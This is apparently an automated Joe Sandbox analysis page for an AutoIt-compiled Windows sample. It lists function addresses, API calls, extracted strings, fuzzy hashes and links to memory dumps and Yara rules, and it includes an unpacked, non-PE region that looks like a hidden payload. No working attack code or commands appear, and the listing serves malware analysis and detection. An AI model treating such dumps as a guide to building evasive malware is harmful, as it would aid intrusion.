Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 14efc9200cfd6d07a438a150c907475247f91dc07c1eb7a6d43ba0784e855cd9
Instruction ID: d58be913a87ed7c983d52e21984705b07cce3d06fbadda290b10481d73c06d31
Opcode Fuzzy Hash: 14efc9200cfd6d07a438a150c907475247f91dc07c1eb7a6d43ba0784e855cd9
Instruction Fuzzy Hash: 7EE0D832910410578210A778EC0D4E9376CEA0533AF600746F872C31E0EB70DD4445D5

Function 00A1E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1E959
timeGetTime.WINMM ref: 00A1EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1ED2E
TranslateMessage.USER32(?), ref: 00A1ED3F
DispatchMessageW.USER32(?), ref: 00A1ED4A
LockWindowUpdate.USER32(00000000), ref: 00A1ED79
DestroyWindow.USER32 ref: 00A1ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1ED9F
Sleep.KERNEL32(0000000A), ref: 00A85270
TranslateMessage.USER32(?), ref: 00A859F7
DispatchMessageW.USER32(?), ref: 00A85A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A85A19

Strings

@GUI_WINHANDLE, xrefs: 00A85360
@GUI_CTRLHANDLE, xrefs: 00A853AC
@TRAY_ID, xrefs: 00A854C9
@GUI_CTRLID, xrefs: 00A85314

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 523b821e15c826fbf6e5671e783d94feb73d997d373677209d8560aae928fcb0
Instruction ID: 2171353ea010c8363c2abe6f15f588f5b02f5d119570a817e3bfea06e914f4b8
Opcode Fuzzy Hash: 523b821e15c826fbf6e5671e783d94feb73d997d373677209d8560aae928fcb0
Instruction Fuzzy Hash: 7A628F70608340DFDB24EF64C985BEA77E4BF44304F18496EED868B292DB75D889CB52

Function 00A45C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00A45EC3
___createFile.LIBCMT ref: 00A45F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00A45F2D
__dosmaperr.LIBCMT ref: 00A45F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00A45F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00A45F6A
__dosmaperr.LIBCMT ref: 00A45F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00A45F7C
__set_osfhnd.LIBCMT ref: 00A45FAC
__lseeki64_nolock.LIBCMT ref: 00A46016
__close_nolock.LIBCMT ref: 00A4603C
__chsize_nolock.LIBCMT ref: 00A4606C
__lseeki64_nolock.LIBCMT ref: 00A4607E
__lseeki64_nolock.LIBCMT ref: 00A46176
__lseeki64_nolock.LIBCMT ref: 00A4618B
__close_nolock.LIBCMT ref: 00A461EB

Part of subcall function 00A3EA9C: CloseHandle.KERNELBASE(00000000,00ABEEF4,00000000,?,00A46041,00ABEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00A3EAEC
Part of subcall function 00A3EA9C: GetLastError.KERNEL32(?,00A46041,00ABEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00A3EAF6
Part of subcall function 00A3EA9C: __free_osfhnd.LIBCMT ref: 00A3EB03
Part of subcall function 00A3EA9C: __dosmaperr.LIBCMT ref: 00A3EB25

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

__lseeki64_nolock.LIBCMT ref: 00A4620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00A46342
___createFile.LIBCMT ref: 00A46361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00A4636E
__dosmaperr.LIBCMT ref: 00A46375
__free_osfhnd.LIBCMT ref: 00A46395
__invoke_watson.LIBCMT ref: 00A463C3
__wsopen_helper.LIBCMT ref: 00A463DD

Strings

@, xrefs: 00A45F98

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 0bbbb2e54247a4a1be6a216334b0b301b7d8fb10aae05a97ce65f448d0d1b7f4
Instruction ID: 30614c9f31db1b3a12e58b0e030c8cbd50f5d4098a1916dbe550682053830955
Opcode Fuzzy Hash: 0bbbb2e54247a4a1be6a216334b0b301b7d8fb10aae05a97ce65f448d0d1b7f4
Instruction Fuzzy Hash: 68221379D00609ABEB299F68DC85BED7B71EF92324F244229F5219B2D2C3758D40C792

Function 00A5FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 00A5FA96
_wcschr.LIBCMT ref: 00A5FAA4
_wcscpy.LIBCMT ref: 00A5FABB
_wcscat.LIBCMT ref: 00A5FACA
_wcscat.LIBCMT ref: 00A5FAE8
_wcscpy.LIBCMT ref: 00A5FB09
__wsplitpath.LIBCMT ref: 00A5FBE6
_wcscpy.LIBCMT ref: 00A5FC0B
_wcscpy.LIBCMT ref: 00A5FC1D
_wcscpy.LIBCMT ref: 00A5FC32
_wcscat.LIBCMT ref: 00A5FC47
_wcscat.LIBCMT ref: 00A5FC59
_wcscat.LIBCMT ref: 00A5FC6E

Part of subcall function 00A5BFA4: _wcscmp.LIBCMT ref: 00A5C03E
Part of subcall function 00A5BFA4: __wsplitpath.LIBCMT ref: 00A5C083
Part of subcall function 00A5BFA4: _wcscpy.LIBCMT ref: 00A5C096
Part of subcall function 00A5BFA4: _wcscat.LIBCMT ref: 00A5C0A9
Part of subcall function 00A5BFA4: __wsplitpath.LIBCMT ref: 00A5C0CE
Part of subcall function 00A5BFA4: _wcscat.LIBCMT ref: 00A5C0E4
Part of subcall function 00A5BFA4: _wcscat.LIBCMT ref: 00A5C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00A5FA61

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 57aac2e3c303a3a103fd88e71f3bf37b3f52887e5c85eea7fc5908b4a7371f09
Instruction ID: 40474b2293249beb2608d4a753132a07bef228078f0cbb6c868c306070b1cec5
Opcode Fuzzy Hash: 57aac2e3c303a3a103fd88e71f3bf37b3f52887e5c85eea7fc5908b4a7371f09
Instruction Fuzzy Hash: F9919072504705AFCB20EB54CA51F9FB3E8BF94314F04496DF9999B291DB30EA48CB92

Function 00A5BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A5BDB4: __time64.LIBCMT ref: 00A5BDBE

Part of subcall function 00A14517: _fseek.LIBCMT ref: 00A1452F

__wsplitpath.LIBCMT ref: 00A5C083

Part of subcall function 00A31DFC: __wsplitpath_helper.LIBCMT ref: 00A31E3C

_wcscpy.LIBCMT ref: 00A5C096
_wcscat.LIBCMT ref: 00A5C0A9
__wsplitpath.LIBCMT ref: 00A5C0CE
_wcscat.LIBCMT ref: 00A5C0E4
_wcscat.LIBCMT ref: 00A5C0F7
_wcscmp.LIBCMT ref: 00A5C03E

Part of subcall function 00A5C56D: _wcscmp.LIBCMT ref: 00A5C65D
Part of subcall function 00A5C56D: _wcscmp.LIBCMT ref: 00A5C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A5C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A5C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A5C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A5C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A5C371

Strings

p1Wu`KXu, xrefs: 00A5C2A1, 00A5C338, 00A5C35F, 00A5C371

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID: p1Wu`KXu
API String ID: 2378138488-4063981602
Opcode ID: 057ce7f888e35c8fb2a1c1ac406f0c92ae1cec99cbe27b999142b393674de5ff
Instruction ID: 0f4c0f040d0659e697acda6306f6c22ef8babae959d999e06e616ba745089c0d
Opcode Fuzzy Hash: 057ce7f888e35c8fb2a1c1ac406f0c92ae1cec99cbe27b999142b393674de5ff
Instruction Fuzzy Hash: 98C12BB1A00219AFDF11DFA4CD81EDEB7BDBF49310F0040A6FA09E6155DB749A888F61

Function 00A13F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A13F86
RegisterClassExW.USER32(00000030), ref: 00A13FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A13FC1
InitCommonControlsEx.COMCTL32(?), ref: 00A13FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A13FEE
LoadIconW.USER32(000000A9), ref: 00A14004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A14013

Strings

0, xrefs: 00A13F68
TaskbarCreated, xrefs: 00A13FB6
AutoIt v3 GUI, xrefs: 00A13FA2
+, xrefs: 00A13F6F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: fbbe323ba9f150afcce46eee90d194fddf37d950a8cab9314f5a614226dfd140
Instruction ID: 57d5efa2b5e31989d606220f28d035765e7c44927233a5ca71ee30dcff9f3a9e
Opcode Fuzzy Hash: fbbe323ba9f150afcce46eee90d194fddf37d950a8cab9314f5a614226dfd140
Instruction Fuzzy Hash: BD2195B5A11219BFDB00DFE5E889BCDBBB5FB08700F00461BF616A62A0D7B54586CF91

Function 00A13742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00A137B3
KillTimer.USER32(?,00000001), ref: 00A137DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A13800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A1380B
CreatePopupMenu.USER32 ref: 00A1381F
PostQuitMessage.USER32(00000000), ref: 00A1382E

Strings

TaskbarCreated, xrefs: 00A13806

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: a8d71a8437b9999c010f08d19dd2edaf752f092197d76183f1b7dc3a7b5d0169
Instruction ID: b296bb0a4fca029c65c9c30c0301f3673b17a579526225bffcace7bea98cef69
Opcode Fuzzy Hash: a8d71a8437b9999c010f08d19dd2edaf752f092197d76183f1b7dc3a7b5d0169
Instruction Fuzzy Hash: 3E41D5F7204156BBDF14EFA8AD4ABFA3779F700301F040516FA13961E1DA609ED29761

Function 00A13E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A13E79
LoadCursorW.USER32(00000000,00007F00), ref: 00A13E88
LoadIconW.USER32(00000063), ref: 00A13E9E
LoadIconW.USER32(000000A4), ref: 00A13EB0
LoadIconW.USER32(000000A2), ref: 00A13EC2

Part of subcall function 00A14024: LoadImageW.USER32(00A10000,00000063,00000001,00000010,00000010,00000000), ref: 00A14048

RegisterClassExW.USER32(?), ref: 00A13F30

Part of subcall function 00A13F53: GetSysColorBrush.USER32(0000000F), ref: 00A13F86
Part of subcall function 00A13F53: RegisterClassExW.USER32(00000030), ref: 00A13FB0
Part of subcall function 00A13F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A13FC1
Part of subcall function 00A13F53: InitCommonControlsEx.COMCTL32(?), ref: 00A13FDE
Part of subcall function 00A13F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A13FEE
Part of subcall function 00A13F53: LoadIconW.USER32(000000A9), ref: 00A14004
Part of subcall function 00A13F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A14013

Strings

0, xrefs: 00A13F02
#, xrefs: 00A13F09
AutoIt v3, xrefs: 00A13F1F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 77d8a31c13a192a0497b3fd47900c81db2f293a2cbcd5b2ba677bd5c85f3c7a8
Instruction ID: ba1873c44777ba42e8e2f1d12dd8a59d52461d0cf1e9cb3c7afee7c1508928ba
Opcode Fuzzy Hash: 77d8a31c13a192a0497b3fd47900c81db2f293a2cbcd5b2ba677bd5c85f3c7a8
Instruction Fuzzy Hash: 6C2131B1E01304BBDB00DFE9ED89A99BBF5EB48310F00422BE215A72A0D77546828F91

Function 00C763D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C764A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C766C7

Memory Dump Source

Source File: 00000000.00000002.1482114122.0000000000C73000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c73000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: d7db83fb1ef55025056ebce409a990e5aa4d515668578a4fff78521710c73655
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: 29A1F370E00209EBDB14CFA4C999BEEBBB5FF48304F208559E519BB280D7759A81DB94

Function 00A149FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00A14A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A841DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A8421A
RegCloseKey.ADVAPI32(?), ref: 00A84249

Strings

Include, xrefs: 00A841D3, 00A84212
Software\AutoIt v3\AutoIt, xrefs: 00A14A13

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 54a1f9a2bfdb9acd55a711ed65e4c3e266e79afe09d26593788c40d7c2ead230
Instruction ID: f60196c7e299a3e8fdefeff3eef4d1bebab3f713f24346767fa237de018c4fa8
Opcode Fuzzy Hash: 54a1f9a2bfdb9acd55a711ed65e4c3e266e79afe09d26593788c40d7c2ead230
Instruction Fuzzy Hash: BD110D71601109BEEB04EBA8DE86DEF7BBCEF09354F104465B506E7191EB709E829B50

Function 00A136B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A136E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13707
ShowWindow.USER32(00000000,?,?,?,?,00A13AA3,?), ref: 00A1371B
ShowWindow.USER32(00000000,?,?,?,?,00A13AA3,?), ref: 00A13724

Strings

AutoIt v3, xrefs: 00A136DE, 00A136E3, 00A136E4
edit, xrefs: 00A13701

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: cd99581b9bd3347622375320f9b6e19a403ecbd44681a70d55fc21d8d987c613
Instruction ID: 0274f0ff109fcbe3f85d62a5b06fe5417fb332112b48f54e6ff14970db2df4b4
Opcode Fuzzy Hash: cd99581b9bd3347622375320f9b6e19a403ecbd44681a70d55fc21d8d987c613
Instruction Fuzzy Hash: 4AF0DA756412D07AE731A7D7AC4CE773F7DD7C7F60B00001BBA06A21A0C6610896DAB0

Function 00C761B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C760A0: Sleep.KERNELBASE(000001F4), ref: 00C760B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C762C2

Strings

ATT6UYIH7DV413EOSHB, xrefs: 00C76325, 00C76328

Memory Dump Source

Source File: 00000000.00000002.1482114122.0000000000C73000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c73000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateFileSleep
String ID: ATT6UYIH7DV413EOSHB
API String ID: 2694422964-4213125336
Opcode ID: 0f07367793759603d1b3f04a6c6220f2394ecc16f85b1b1d7402c31401bc8f30
Instruction ID: f6e3dccf16bbc4b737b41db99731c1d3506a7511cbcd805665b220194b1d494a
Opcode Fuzzy Hash: 0f07367793759603d1b3f04a6c6220f2394ecc16f85b1b1d7402c31401bc8f30
Instruction Fuzzy Hash: 81518230D04249EBEF11DBE4C814BEEBB79AF14300F008199E258BB2C1D7B95B48CBA5

Function 00A151AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00A1522F
_wcscpy.LIBCMT ref: 00A15283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A15293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A83CB0

Strings

Line: , xrefs: 00A83CD9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 2ba8c3e1f293acda2c2561afd2d3a75daf6ea433221ed3b0586e8166ebf0aa71
Instruction ID: e5569eb784993f9e905b05f339966dce0e86c631219793f983235133c77faf9f
Opcode Fuzzy Hash: 2ba8c3e1f293acda2c2561afd2d3a75daf6ea433221ed3b0586e8166ebf0aa71
Instruction Fuzzy Hash: 1D319072508740BED721FBA0ED46FDE77E8AB84310F00461FF58692191DB74A6898B96

Function 00A12322 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00A122A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A124F1), ref: 00A12303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A125A1
CoInitialize.OLE32(00000000), ref: 00A12618
CloseHandle.KERNEL32(00000000), ref: 00A8503A

Strings

6, xrefs: 00A1237A
8, xrefs: 00A123C7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID: 6$8
API String ID: 3815369404-1025241883
Opcode ID: 35a0b91eb3ecdc7d9ed02803cf8ceeb8465ce2258dde827cfa6bd7879ea78b41
Instruction ID: 48b164503a7c471478253efe8aa4c5e837a50c96a1324d70205845b6cf82440c
Opcode Fuzzy Hash: 35a0b91eb3ecdc7d9ed02803cf8ceeb8465ce2258dde827cfa6bd7879ea78b41
Instruction Fuzzy Hash: DB71AFB4A03241AB8744EFEAB9905D5BBA4F799344780427FD15BCB7B2CB364442CF54

Function 00A14139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

